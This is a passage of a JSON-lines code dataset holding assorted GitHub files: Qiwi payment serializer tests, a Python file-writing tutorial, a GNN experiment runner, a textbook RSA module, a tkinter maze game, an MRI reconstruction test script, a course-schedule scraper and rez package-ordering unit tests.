\"7570b3fd44b5b9f991ab975b5ba58876fd937ae2b34b078ae391b7468a6f65eb\"\n },\n )\n\n assert not serializer.is_valid()\n\n def test_if_unexpected_status(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"10.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PENDING\",\n },\n }\n },\n context={\n \"hmac\": \"6d37eb02527ba99d9e75f2a9de338497f5e154ec0c0fee614ef10e7597dd39db\"\n },\n )\n\n assert not serializer.is_valid()\n","repo_name":"la1t/django_pay","sub_path":"tests/providers/qiwi/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40201035338","text":"# 打开一个不存在的文件,w:文件不存在会新建\nf = open(\"D:/python/project-learn/05_文件操作/test.txt\", \"w\", encoding=\"UTF-8\")\n# write - 写入(将内容写入到内存中)\nf.write(\"hello world!!\")\n# flush - 刷新(将内存中积攒的内容,写入到硬盘的文件中)\nf.flush()\n# close - 关闭(close方法,内置了flush的功能\nf.close()\n\n# # 打开一个存在的文件,文件原有内容会被清空\n# f = open(\"D:/python/project-learn/05_文件操作/test.txt\", \"w\", encoding=\"UTF-8\")\n# # write写入\n# f.write(\"我是小明\")\n# # close关闭\n# f.close()\n","repo_name":"Marcoming1990/python_learn","sub_path":"05_文件操作/02_文件的写入.py","file_name":"02_文件的写入.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9256273400","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom pathlib import Path\nimport yaml\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom torch import multiprocessing\nimport sys\n\nfrom data import 
get_dataset\nfrom models import get_model\nfrom optimizer import get_optim\nfrom training_methods import get_train\n\n\ndef find_pars_yaml(argv = []):\n paths = []\n ret = []\n if len(argv) >= 2:\n if(argv[1] != \"glob\"):\n for x in range(1, len(argv)):\n paths.append(Path(\"../experiments/\" + argv[x]))\n else:\n for x in range(2, len(argv)):\n paths.extend(Path(\"../experiments/\").glob(argv[x]))\n else:\n paths = Path(\"../experiments/\").glob(\"*.yml\")\n for p in paths:\n yml = yaml.safe_load(p.open())\n if yml.get(\"alldone\"):\n continue\n else:\n ret.append(p)\n return ret\n\ndef num2conf(num, lens):\n left = num\n res = [0]*len(lens)\n for ix in range(len(lens)-1, -1, -1):\n res[ix] = left % lens[ix]\n left = int(left/lens[ix])\n return res\n\ndef dict2dev(d, dev):\n return {x : d[x].to(dev) for x in d}\n\ndef train1setting(settings, save_path):\n pr_nr = int(multiprocessing.current_process().name.split(\"-\")[1])\n d = {0:0, 1:1, 2:0, 3:1, 4:2}\n device = torch.device(\"cuda:\"+str(d[pr_nr%2]) if torch.cuda.is_available() else \"cpu\")\n #device = torch.device(\"cuda:3\")\n save_path.mkdir(parents=True, exist_ok=True)\n ds = get_dataset(settings, device)\n yaml.dump(settings, (save_path/\"settings.yml\").open(mode=\"w\"))\n if type(settings[\"statrep\"])==int:\n start = 0\n end = settings[\"statrep\"]\n else:\n start = int(settings[\"statrep\"].split(\"_\")[0])\n end = int(settings[\"statrep\"].split(\"_\")[1])\n\n for rep in range(start, end):\n p = save_path / (\"stats_\"+str(rep)+\".pkl\")\n if p.exists():\n continue\n #print(\"rep\", rep)\n ds.setRep(rep)\n #torch.cuda.empty_cache()\n torch.manual_seed(rep)\n model = get_model(settings, ds.num_node_features, ds.num_classes).to(device)\n opt = get_optim(model, settings)\n train = get_train(settings)\n model_path = save_path / (\"model_\"+str(rep)+\".pt\")\n stats = train(ds, model, opt, settings, save_path = model_path)\n if settings[\"save_models\"] and settings[\"early_stopping\"]==False:\n torch.save(model.state_dict(), model_path)\n stats.to_pickle(p)\n\n#glue method to use imap\ndef f(args):\n i, lens, keys, settings_dict, save_path = args\n conf = num2conf(i, lens)\n current_dict = {keys[i]:settings_dict[keys[i]][conf[i]] for i in range(len(conf))}\n train1setting(current_dict, save_path/(\"setting_\"+str(i)))\n \ndef run1exp(save_path, settings_dict, p):\n setting_ls = list(settings_dict.items())\n lens = [len(x[1]) for x in setting_ls]\n keys = [x[0] for x in setting_ls]\n n = np.prod(np.array(lens))\n it = list(zip(range(n), [lens]*n, [keys]*n, [settings_dict]*n, [save_path]*n))\n tmp = list(tqdm(p.imap(f, it), total=len(it)))\n\n\ndef main(argv):\n paths2do = find_pars_yaml(argv)\n print(\"#\"*30)\n print(\"will run \"+str(len(paths2do))+\" experiments:\")\n print(paths2do)\n print(\"#\"*30)\n multiprocessing.set_start_method(\"forkserver\")\n with multiprocessing.Pool(2) as p:\n for count, path in enumerate(paths2do):\n print((count+1), \"of\", len(paths2do), \"doing\", path)\n yml = yaml.safe_load(path.open())\n print(yml)\n print(\"#\"*30)\n save_path = Path(\"../results/\"+path.parts[-1].split(\".\")[0]+\"/\")\n run1exp(save_path, yml, p)\n yml[\"alldone\"] = True\n yaml.dump(yml, path.open(mode=\"w\"))\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"Foisunt/FMMs-in-GNNs","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"20425446544","text":"# from 
struct import pack\nfrom .utils import int2bytes, bytes2int\n\n\ndef decrypt(crypto, n, d):\n return int2bytes(pow(bytes2int(crypto), d, n))\n\n\ndef encrypt(message, n, e):\n i = bytes2int(message)\n assert i <= n\n return int2bytes(pow(i, e, n))\n\n\ndef vencrypt(n, e, src, out):\n from random import SystemRandom\n from .varint import encode, encode_stream\n\n # from sys import stderr\n\n random = SystemRandom()\n bits_max = n.bit_length()\n q, r = divmod(bits_max - 1, 8)\n bytes_max = q if q > 0 else q + 1\n getrandbits = random.getrandbits\n\n def mkprefix(x):\n return bytes(encode(getrandbits(random.randrange(32, 48)))) + bytes(encode(x))\n\n i = 0\n prefix = mkprefix(i)\n block = src.read(bytes_max - len(prefix))\n while block:\n cypher = encrypt(prefix + block, n, e)\n # print('E', i, len(cypher), file=stderr)\n encode_stream(out, len(cypher))\n out.write(cypher)\n # print('blob', blob)\n i += 1\n prefix = mkprefix(i)\n block = src.read(bytes_max - len(prefix))\n\n\ndef vdecrypt(n, d, src, out, i=0):\n from .varint import decode_stream\n from io import BytesIO\n\n s = decode_stream(src)\n while s > 0:\n cypher = src.read(s)\n blob = decrypt(cypher, n, d)\n # print('D', i, s, len(blob))\n b = BytesIO(blob)\n salt = decode_stream(b)\n index = decode_stream(b)\n block = b.read()\n # print(n, index, salt, blob)\n assert index == i\n assert salt != 0\n out.write(block)\n i += 1\n s = decode_stream(src)\n","repo_name":"biojet1/mendec","sub_path":"mendec/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6923922189","text":"import xlrd\nimport datetime\nfrom matplotlib import pyplot as plt\n\n\nclass Rosters:\n def __init__(self, filename) -> None:\n workbook = xlrd.open_workbook(filename)\n self.worksheet = workbook.sheet_by_index(0)\n\n def print(self, row_offset, col_offset):\n col_offset = col_offset * 5\n row_offset = 6 + row_offset * 4 + row_offset * 25\n for row in range(row_offset, row_offset+25):\n for col in range(col_offset, col_offset+4):\n # Print the cell values with tab space\n print(self.worksheet.cell_value(row, col), end='\\t')\n print('')\n\n def list(self, row_offset, col_offset):\n roster = []\n\n col_offset = col_offset * 5\n row_offset = 6 + row_offset * 4 + row_offset * 25\n for row in range(row_offset, row_offset+25):\n roster.append({\n 'Created': datetime.datetime.now(),\n 'Role': self.worksheet.cell_value(row, col_offset+0),\n 'Name': self.worksheet.cell_value(row, col_offset+1),\n 'Team': self.worksheet.cell_value(row, col_offset+2),\n 'Cost': self.worksheet.cell_value(row, col_offset+3)\n })\n return roster","repo_name":"andregri/fantablog","sub_path":"python/rose/roster.py","file_name":"roster.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24296800465","text":"# python3\n\nfrom collections import namedtuple\n\nRequest = namedtuple(\"Request\", [\"arrived_at\", \"time_to_process\"])\nResponse = namedtuple(\"Response\", [\"was_dropped\", \"started_at\"])\n\n\nclass Buffer:\n def __init__(self, size):\n self.size = size\n self.finish_time = []\n\n def process(self, request):\n start = request[0]\n if not self.finish_time:\n self.finish_time.append(request[1])\n return Response(False, start)\n if start + self.size > self.finish_time[-1]:\n self.finish_time.append(request[1])\n return Response(False, 
sum(self.finish_time[:-1]))\n return Response(False, -1)\n\n\ndef process_requests(requests, buffer):\n responses = []\n for request in requests:\n responses.append(buffer.process(request))\n return responses\n\n\ndef main():\n f = open(\"tests/18\", \"r\")\n buffer_size, n_requests = map(int, f.readline().split())\n # buffer_size, n_requests = map(int, input().split())\n requests = []\n for _ in range(n_requests):\n arrived_at, time_to_process = map(int, f.readline().split())\n # arrived_at, time_to_process = map(int, input().split())\n requests.append(Request(arrived_at, time_to_process))\n\n buffer = Buffer(buffer_size)\n responses = process_requests(requests, buffer)\n\n for response in responses:\n print(response.started_at if not response.was_dropped else -1)\n\n\nmain()\n# if __name__ == \"__main__\":\n# main()\n\n# Input_file = open(\"tests/03\", \"r\")\n# for n in Input_file:\n# main()\n\n\n# print __name__\n","repo_name":"qmcgilvery/Dashboard","sub_path":"USD/Data Structures/week1_basic_data_structures/3_network_simulation/process_packages.py","file_name":"process_packages.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4169709364","text":"import tkinter as tk\nimport maze_maker as mm\nimport random\n\ndef key_down(event):\n global key\n key = event.keysym\n #print(f\"{key}キーが押されました\")\n\ndef key_up(event):\n global key\n key = \"\"\n\ndef main_proc():\n global cx, cy, mx, my\n\n d = { # キー:押されているキーkey/値: 移動幅リスト[x,y]\n \"Up\":[0, -1],\n \"Down\": [0, +1],\n \"Left\": [-1, 0],\n \"Right\": [+1, 0],\n }\n \n try:\n if maze_bg[ my+d[key][1]][mx+d[key][0]] == 0: # もし移動先が床ならば\n my, mx = my+d[key][1], mx+d[key][0]\n except:\n pass\n\n\n cx, cy = mx*100+50, my*100+50\n canvas.coords(\"tori\", cx, cy)\n root.after(100, main_proc)\n\ndef add_enemy(): #teki1をランダムに出力\n global cx, cy, dx, dy, teki\n teki1 = tk.PhotoImage(file=\"fig/43012274426004b86abe4d47172c8ee8.png\")\n dx = random.randint(0, 13)\n dy = random.randint(0, 13)\n cx, cy = 100*dx, 100*dy\n canvas.create_image(cx, cy, image=teki, tag=\"teki1\")\n canvas.coords(\"teki1\", cx, cy)\n root.after(200, add_enemy)\n\nif __name__ == \"__main__\":\n global key\n root = tk.Tk()\n root.title(\"pakupakumeiro\")\n \n canvas = tk.Canvas(root, width=1500, height=900, bg=\"black\")\n canvas.pack()\n\n maze_bg = mm.make_maze(15, 9) # 1:壁 0:床 を表す二次元リスト\n #print(maze_bg)\n mm.show_maze(canvas, maze_bg)# \n\n pakuman = tk.PhotoImage(file=\"fig/b312acaa0397b6d20574f475e35f5ffc.png\")\n pakuman = pakuman.zoom(5)\n pakuman = pakuman.subsample(32)\n mx, my = 1, 1\n cx, cy = mx*100+50, my*100+50\n #cx, cy = 300, 400\n canvas.create_image(cx, cy, image=pakuman, tag=\"tori\")\n\n dx = random.randint(0, 13)\n dy = random.randint(0, 13)\n teki = tk.PhotoImage(file=\"fig/43012274426004b86abe4d47172c8ee8.png\")\n teki = teki.zoom(5)\n teki = teki.subsample(32)\n cx, cy = 100*dx, 100*dy\n canvas.create_image(cx, cy, image = teki, tag=\"teki1\")\n\n key = \"\"\n\n root.bind(\"\", key_down)\n root.bind(\"\", key_up)\n\n root.after(0, main_proc)\n root.after(0, add_enemy)\n\n #main_proc()\n\n \n root.mainloop()","repo_name":"c0a2110686/ProjExD","sub_path":"ex03/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"14021379584","text":"import time\r\nfrom utils import *\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\r\n#from 
utils_kdata import *\r\nfrom KI_DENSE import *\r\nimport tensorflow as tf\r\nimport matplotlib.image as mpimg\r\nimport numpy as np\r\nimport os\r\nimport datetime\r\n# Configs\r\nprint('[*] run basic configs ... ')\r\nsave_path = r'' #保存模型路径\r\nsave_path = os.path.join(save_path, '20230512-1757')\r\ncheckpoint_dir = os.path.join(save_path, \"best_checkpoint\")\r\ntestdata_path = r'' #测试集数据路径\r\nBATCH_SIZE = 16\r\ntest_results_path = os.path.join(save_path, 'result')\r\ntry:\r\n os.mkdir(test_results_path)\r\nexcept FileExistsError:\r\n pass\r\n\r\n# Input Pipeline\r\nprint('[*] load data ... ')\r\nlabels_test, sparses_test,mask = data_process2(testdata_path)\r\ntest_dataset = tf.data.Dataset.from_tensor_slices((sparses_test[:128], labels_test[:128]))\r\ntest_dataset = test_dataset.batch(BATCH_SIZE)\r\n\r\nmask = tf.cast(mask, tf.complex64)\r\n\r\n# Build the Generator\r\nprint('[*] define model ... ')\r\nslices, nw, nh, nz = sparses_test.shape\r\ngenerator = getModel(nw, nh, nz)\r\nslices = 128\r\n# Define Optimizer\r\ngenerator_optimizer = tf.keras.optimizers.Adam(0.5)\r\n\r\n# Checkpoints (Object-based saving)\r\ncheckpoint = tf.train.Checkpoint(optimizer=generator_optimizer,\r\n model=generator)\r\nckpt_manager = tf.train.CheckpointManager(checkpoint, checkpoint_dir, max_to_keep=5)\r\n\r\nstart_epoch = 0\r\nif ckpt_manager.latest_checkpoint:\r\n start_epoch = int(ckpt_manager.checkpoints[-1].split('-')[-1])\r\n checkpoint.restore(ckpt_manager.checkpoints[-1])\r\n print('[**] Latest checkpoint: {0} restored!'.format(start_epoch))\r\nphase = 96\r\n# Evaluate\r\nsteps = slices//BATCH_SIZE\r\ncnn1 = np.zeros([steps, BATCH_SIZE, 96, phase, 2])\r\ngt1 = np.zeros([steps, BATCH_SIZE, 96, phase, 1])\r\nzf1 = np.zeros([steps, BATCH_SIZE, 96, phase, 2])\r\nnum = 0\r\nstep = 0\r\nZF_PATH, CNN_PATH, GT_PATH, CONCAT_PATH, Metrics_PATH = make_results_dir(test_results_path)\r\n\r\nfor inp, tar in test_dataset:\r\n step += 1\r\n mask2 = tf.expand_dims(mask, 0)\r\n mask2 = tf.tile(mask2, [inp.get_shape()[0], 1, 1, 1])\r\n mask2 = tf.reshape(mask2, mask2.get_shape()[:3])\r\n prediction,K = generator([inp, mask2])\r\n cnn1[step-1] = prediction\r\n gt1[step-1] = tf.abs(tar)\r\n zf1[step-1] = inp\r\n max_samples = tf.shape(inp)[0]\r\n image = tf.concat(axis=2, values=[tf.abs(tar), c2r(inp), c2r(prediction)])\r\n image = image[0:max_samples, :, :]\r\n image = tf.concat(axis=0, values=[image[i] for i in range(max_samples)])\r\n mpimg.imsave(os.path.join(CONCAT_PATH, '{:03d}.tif'.format(step)), tf.squeeze(image), cmap='gray')\r\n\r\n for i in range(max_samples):\r\n num += 1\r\n inp1=c2r(inp)\r\n prediction1=c2r(prediction)\r\n tar = tf.abs(tar)\r\n mpimg.imsave(os.path.join(ZF_PATH, '{:03d}.tif'.format(num)), inp1[i, :, :, 0], cmap='gray')\r\n mpimg.imsave(os.path.join(GT_PATH, '{:03d}.tif'.format(num)), tar[i, :, :, 0], cmap='gray')\r\n mpimg.imsave(os.path.join(CNN_PATH, '{:03d}.tif'.format(num)), prediction1[i, :, :, 0], cmap='gray')\r\n\r\n\r\ncnn1 = np.reshape(cnn1, [-1, phase, phase, 2])\r\ngt1 = np.reshape(gt1, [-1, phase, phase, 1])\r\nzf1 = np.reshape(zf1, [-1, phase, phase, 2])\r\nscipy.io.savemat(Metrics_PATH, {'cnn1': cnn1, 'gt1': gt1, 'zf1': zf1})\r\n\r\nprint(\"[**] Test Completed\")\r\n\r\n","repo_name":"zimli/EN2-convolution-network","sub_path":"test_KI.py","file_name":"test_KI.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9235452636","text":"from cqupt.urls import URL_TASKS\nfrom 
cqupt.log import loading\nfrom prettytable import PrettyTable\nfrom bs4 import BeautifulSoup\n\n\nclass Task:\n task: list = []\n\n @classmethod\n @loading('正在获取考试安排')\n def crawl(cls, request):\n soup = BeautifulSoup(request.get(URL_TASKS).text, 'html.parser')\n for tr in soup.find('tbody').findAll('tr'):\n tds = tr.findAll('td')[5:]\n cls.task.append([\n tds[0].text, # 课程名称\n tds[4].text, # 教室号\n tds[5].text, # 座位号\n tds[1].text, # 周次\n tds[2].text, # 星期\n tds[3].text, # 具体时间\n tds[6].text # 资格\n ])\n\n @classmethod\n def handle(cls, request, arg):\n cls.crawl(request)\n row = None\n table = PrettyTable(['课程名称', '教室', '座位', '周次', '星期', '具体时间', '资格'])\n if cls.task:\n for row in cls.task:\n table.add_row(row)\n if cls.task:\n print('\\n共', len(cls.task), '项考试')\n print(table)\n print('多喝热水, 及时做好复习准备哦~')\n else:\n print('\\n无查询结果!')","repo_name":"mivinci/cqupt-piper","sub_path":"cqupt/crawlers/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"43884315054","text":"import json\n\nfrom rez.config import config\nfrom rez.package_order import NullPackageOrder, PackageOrder, PerFamilyOrder, VersionSplitPackageOrder, \\\n TimestampPackageOrder, SortedOrder, PackageOrderList, from_pod\nfrom rez.packages import iter_packages\nfrom rez.tests.util import TestBase, TempdirMixin\nfrom rez.version import Version\n\n\nclass _BaseTestPackagesOrder(TestBase, TempdirMixin):\n \"\"\"Base class for a package ordering test case\"\"\"\n @classmethod\n def setUpClass(cls):\n TempdirMixin.setUpClass()\n\n cls.py_packages_path = cls.data_path(\"packages\", \"py_packages\")\n cls.solver_packages_path = cls.data_path(\"solver\", \"packages\")\n\n cls.settings = dict(\n packages_path=[\n cls.solver_packages_path,\n cls.py_packages_path\n ],\n package_filter=None)\n\n @classmethod\n def tearDownClass(cls):\n TempdirMixin.tearDownClass()\n\n def _test_reorder(self, orderer, package_name, expected_order):\n \"\"\"Ensure ordered order package version as expected.\"\"\"\n it = iter_packages(package_name)\n descending = sorted(it, key=lambda x: x.version, reverse=True)\n ordered = orderer.reorder(descending) or descending\n result = [str(x.version) for x in ordered]\n self.assertEqual(expected_order, result)\n\n def _test_pod(self, orderer):\n \"\"\"Ensure an orderer integrity when serialized to pod.\"\"\"\n pod = json.loads(json.dumps(orderer.to_pod())) # roundtrip to JSON\n actual = orderer.__class__.from_pod(pod)\n self.assertEqual(orderer, actual)\n\n\nclass TestAbstractPackageOrder(TestBase):\n \"\"\"Test case for the abstract PackageOrder class\"\"\"\n\n def test_reorder(self):\n \"\"\"Validate reorder is not implemented\"\"\"\n with self.assertRaises(NotImplementedError):\n PackageOrder().reorder([])\n\n def test_to_pod(self):\n \"\"\"Validate to_pod is not implemented\"\"\"\n self.assertRaises(NotImplementedError, PackageOrder().to_pod)\n\n def test_str(self):\n \"\"\"Validate __str__ is not implemented\"\"\"\n with self.assertRaises(NotImplementedError):\n str(PackageOrder())\n\n def test_eq(self):\n \"\"\"Validate __eq__ is not implemented\"\"\"\n with self.assertRaises(NotImplementedError):\n PackageOrder() == PackageOrder()\n\n\nclass TestNullPackageOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the NullPackageOrder class\"\"\"\n\n def test_repr(self):\n \"\"\"Validate we can represent a VersionSplitPackageOrder as a string.\"\"\"\n self.assertEqual(\"NullPackageOrder({})\", 
repr(NullPackageOrder()))\n\n def test_comparison(self):\n \"\"\"Validate we can compare VersionSplitPackageOrder together.\"\"\"\n inst1 = NullPackageOrder()\n inst2 = NullPackageOrder()\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == \"wrong_type\") # __eq__ negative (wrong type)\n self.assertTrue(inst1 != \"wrong_type\") # __ne__ positive (wrong type)\n self.assertFalse(inst1 != inst2) # __ne__ negative\n\n def test_pod(self):\n \"\"\"Validate we can save and load a VersionSplitPackageOrder to it's pod representation.\"\"\"\n self._test_pod(NullPackageOrder())\n\n def test_sha1(self):\n \"\"\"Validate we can get a sha1 hash.\n \"\"\"\n self.assertEqual(\n 'bf7c2fa4e6bd198c02adeea2c3a382cf57242051', NullPackageOrder().sha1\n )\n\n\nclass TestSortedOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the SortedOrder class\"\"\"\n\n def test_reorder_ascending(self):\n \"\"\"Validate we can sort packages in ascending order.\"\"\"\n self._test_reorder(SortedOrder(descending=False), \"pymum\", [\"1\", \"2\", \"3\"])\n\n def test_reorder_descending(self):\n \"\"\"Validate we can sort packages in descending order.\"\"\"\n self._test_reorder(SortedOrder(descending=True), \"pymum\", [\"3\", \"2\", \"1\"])\n\n def test_comparison(self):\n \"\"\"Validate we can compare SortedOrder together.\"\"\"\n inst1 = SortedOrder(descending=False)\n inst2 = SortedOrder(descending=False)\n inst3 = SortedOrder(descending=True)\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative\n self.assertTrue(inst1 != inst3) # __ne__ positive\n self.assertFalse(inst1 != inst2) # __ne__ negative\n self.assertFalse(inst1 == \"wrong_type\") # __eq__ negative (wrong type)\n self.assertTrue(inst1 != \"wrong_type\") # __eq__ negative (wrong type)\n\n def test_repr(self):\n \"\"\"Validate we can represent a SortedOrder as a string.\"\"\"\n self.assertEqual(\"SortedOrder(True)\", repr(SortedOrder(descending=True)))\n\n def test_pod(self):\n \"\"\"Validate we can save and load a SortedOrder to it's pod representation.\"\"\"\n self._test_pod(SortedOrder(descending=True))\n\n\nclass TestPerFamilyOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the PerFamilyOrder class\"\"\"\n\n def test_reorder(self):\n \"\"\"Test ordering.\"\"\"\n expected_null_result = [\"7\", \"6\", \"5\"]\n expected_split_result = [\"2.6.0\", \"2.5.2\", \"2.7.0\", \"2.6.8\"]\n expected_timestamp_result = [\"1.1.1\", \"1.1.0\", \"1.0.6\", \"1.0.5\", \"1.2.0\", \"2.0.0\", \"2.1.5\", \"2.1.0\"]\n\n orderer = PerFamilyOrder(\n order_dict=dict(\n pysplit=NullPackageOrder(),\n python=VersionSplitPackageOrder(Version(\"2.6.0\")),\n timestamped=TimestampPackageOrder(timestamp=3001, rank=3)\n ),\n default_order=SortedOrder(descending=False)\n )\n\n self._test_reorder(orderer, \"pysplit\", expected_null_result)\n self._test_reorder(orderer, \"python\", expected_split_result)\n self._test_reorder(orderer, \"timestamped\", expected_timestamp_result)\n self._test_reorder(orderer, \"pymum\", [\"1\", \"2\", \"3\"])\n\n def test_reorder_no_packages(self):\n \"\"\"Validate ordering for a family with no packages.\"\"\"\n orderer = PerFamilyOrder(order_dict=dict(missing_package=NullPackageOrder()))\n self._test_reorder(orderer, \"missing_package\", [])\n\n def test_reorder_no_default_order(self):\n \"\"\"Test behavior when there's no secondary default_order.\"\"\"\n fam_orderer = PerFamilyOrder(order_dict={})\n self._test_reorder(fam_orderer, \"pymum\", [\"3\", \"2\", \"1\"])\n\n def 
test_comparison(self):\n \"\"\"Validate we can compare PerFamilyOrder.\"\"\"\n inst1 = PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=NullPackageOrder())\n inst2 = PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=NullPackageOrder())\n inst3 = PerFamilyOrder(order_dict={'bar': NullPackageOrder()}, default_order=NullPackageOrder())\n inst4 = PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=None)\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative (different order dict)\n self.assertFalse(inst1 == inst4) # __eq__ negative (different default_order)\n self.assertTrue(inst1 != inst3) # __ne__ positive (different order dict)\n self.assertTrue(inst1 != inst4) # __ne__ positive (different default order)\n self.assertFalse(inst1 != inst2) # __ne__ negative\n\n def test_repr(self):\n \"\"\"Validate we can represent a PerFamilyOrder as a string.\"\"\"\n inst = PerFamilyOrder(order_dict={\"family1\": VersionSplitPackageOrder(Version(\"2.6.0\"))})\n self.assertEqual(\"PerFamilyOrder(([('family1', '2.6.0')], 'None'))\", repr(inst))\n\n def test_pod(self):\n \"\"\"Validate we can save and load a PerFamilyOrder to it's pod representation.\"\"\"\n self._test_pod(\n PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=NullPackageOrder())\n )\n\n # No default_order\n self._test_pod(\n PerFamilyOrder(order_dict={'foo': NullPackageOrder()})\n )\n\n\nclass TestVersionSplitPackageOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the VersionSplitPackageOrder class\"\"\"\n\n def test_reordere(self):\n \"\"\"Validate package ordering with a VersionSplitPackageOrder\"\"\"\n orderer = VersionSplitPackageOrder(Version(\"2.6.0\"))\n expected = [\"2.6.0\", \"2.5.2\", \"2.7.0\", \"2.6.8\"]\n self._test_reorder(orderer, \"python\", expected)\n\n def test_comparison(self):\n \"\"\"Validate we can compare VersionSplitPackageOrder together.\"\"\"\n inst1 = VersionSplitPackageOrder(first_version=Version(\"1.2.3\"))\n inst2 = VersionSplitPackageOrder(first_version=Version(\"1.2.3\"))\n inst3 = VersionSplitPackageOrder(first_version=Version(\"1.2.4\"))\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative\n self.assertTrue(inst1 != inst3) # __ne__ positive\n self.assertFalse(inst1 != inst2) # __ne__ negative\n self.assertFalse(inst1 == \"wrong_type\") # __eq__ negative (wrong type)\n self.assertTrue(inst1 != \"wrong_type\") # __eq__ negative (wrong type)\n\n def test_repr(self):\n \"\"\"Validate we can represent a VersionSplitPackageOrder as a string.\"\"\"\n inst = VersionSplitPackageOrder(first_version=Version(\"1,2,3\"))\n self.assertEqual(\"VersionSplitPackageOrder(1,2,3)\", repr(inst))\n\n def test_pod(self):\n \"\"\"Validate we can save and load a VersionSplitPackageOrder to it's pod representation.\"\"\"\n self._test_pod(VersionSplitPackageOrder(first_version=Version(\"1.2.3\")))\n\n\nclass TestTimestampPackageOrder(_BaseTestPackagesOrder):\n \"\"\"Test cases for the TimestampPackageOrder class\"\"\"\n\n def test_reorder_no_rank(self):\n \"\"\"Validate reordering with a rank of 0.\"\"\"\n orderer = TimestampPackageOrder(timestamp=3001)\n expected = ['1.1.0', '1.0.6', '1.0.5', '1.1.1', '1.2.0', '2.0.0', '2.1.0', '2.1.5']\n self._test_reorder(orderer, \"timestamped\", expected)\n\n def test_reorder_rank_3(self):\n \"\"\"Validate reordering with a rank of 3.\"\"\"\n # after v1.1.0 and before v1.1.1\n orderer1 = 
TimestampPackageOrder(timestamp=3001, rank=3)\n expected1 = [\"1.1.1\", \"1.1.0\", \"1.0.6\", \"1.0.5\", \"1.2.0\", \"2.0.0\", \"2.1.5\", \"2.1.0\"]\n self._test_reorder(orderer1, \"timestamped\", expected1)\n\n # after v2.1.0 and before v2.1.5\n orderer2 = TimestampPackageOrder(timestamp=7001, rank=3)\n expected2 = [\"2.1.5\", \"2.1.0\", \"2.0.0\", \"1.2.0\", \"1.1.1\", \"1.1.0\", \"1.0.6\", \"1.0.5\"]\n self._test_reorder(orderer2, \"timestamped\", expected2)\n\n def test_reorder_rank_2(self):\n \"\"\"Add coverage for a corner case where there's only one candidate without the rank.\"\"\"\n orderer = TimestampPackageOrder(timestamp=4001, rank=3) # 1.1.1\n expected = ['1.1.1', '1.1.0', '1.0.6', '1.0.5', '1.2.0', '2.0.0', '2.1.5', '2.1.0']\n self._test_reorder(orderer, \"timestamped\", expected)\n\n def test_reorder_packages_without_timestamps(self):\n \"\"\"Validate reordering of packages that have no timestamp data.\"\"\"\n orderer = TimestampPackageOrder(timestamp=3001)\n self._test_reorder(orderer, \"pymum\", [\"3\", \"2\", \"1\"])\n\n def test_reorder_all_packages_before_timestamp(self):\n \"\"\"Test behavior when all packages are before the timestamp.\"\"\"\n timestamp_orderer = TimestampPackageOrder(timestamp=9999999999, rank=3)\n expected = ['2.1.5', '2.1.0', '2.0.0', '1.2.0', '1.1.1', '1.1.0', '1.0.6', '1.0.5']\n self._test_reorder(timestamp_orderer, \"timestamped\", expected)\n\n def test_reorder_all_packages_after_timestamp(self):\n \"\"\"Test behavior when all packages are after the timestamp.\"\"\"\n timestamp_orderer = TimestampPackageOrder(timestamp=0, rank=3)\n expected = ['1.0.6', '1.0.5', '1.1.1', '1.1.0', '1.2.0', '2.0.0', '2.1.5', '2.1.0']\n self._test_reorder(timestamp_orderer, \"timestamped\", expected)\n\n def test_comparison(self):\n \"\"\"Validate we can compare TimestampPackageOrder.\"\"\"\n inst1 = TimestampPackageOrder(timestamp=1, rank=1)\n inst2 = TimestampPackageOrder(timestamp=1, rank=1)\n inst3 = TimestampPackageOrder(timestamp=2, rank=1)\n inst4 = TimestampPackageOrder(timestamp=2, rank=2)\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative (different timestamp)\n self.assertFalse(inst1 == inst4) # __eq__ negative (different rank)\n 